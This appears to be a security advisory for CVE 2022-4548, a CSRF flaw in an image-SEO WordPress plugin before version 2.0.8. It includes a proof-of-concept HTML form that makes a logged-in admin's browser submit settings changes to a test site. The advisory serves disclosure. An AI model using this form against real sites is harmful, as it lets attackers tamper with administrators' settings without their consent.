Optimize images ALT Text (alt tag) & names for SEO using AI < 2.0.8 – Settings Update via CSRF | CVE 2022-4548

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.

Proof of Concept

Use the following form to abuse the CSRF vulnerability on the settings page:

<html><form enctype="application/x-www-form-urlencoded" method="POST" action="https://vulnerable.imageseo.ddev.site/"><table><tr><td>action</td><td><input type="text" value="imageseo_social_media_settings_save" name="action"></td></tr>
<tr><td>layout</td><td><input type="text" value="CARD_LEFT" name="layout"></td></tr>
<tr><td>textColor</td><td><input type="text" value="#000000" name="textColor"></td></tr>
<tr><td>contentBackgroundColor</td><td><input type="text" value="#ffffff" name="contentBackgroundColor"></td></tr>
<tr><td>starColor</td><td><input type="text" value="#F8CA00" name="starColor"></td></tr>
<tr><td>visibilitySubTitle</td><td><input type="text" value="true" name="visibilitySubTitle"></td></tr>
<tr><td>visibilitySubTitleTwo</td><td><input type="text" value="true" name="visibilitySubTitleTwo"></td></tr>
<tr><td>visibilityAvatar</td><td><input type="text" value="true" name="visibilityAvatar"></td></tr>
<tr><td>visibilityRating</td><td><input type="text" value="false" name="visibilityRating"></td></tr>
<tr><td>defaultBgImg</td><td><input type="text" value="http://7957.imageseo.ddev.site/wp-content/plugins/imageseo/dist/images/default_logo.png" name="defaultBgImg"></td></tr>
<tr><td>textAlignment</td><td><input type="text" value="top" name="textAlignment"></td></tr>
<tr><td>logoUrl</td><td><input type="text" value="http://7957.imageseo.ddev.site/wp-content/plugins/imageseo/dist/images/favicon.png" name="logoUrl"></td></tr>
</table><input type="submit" value="https://vulnerable.imageseo.ddev.site/"></form></html>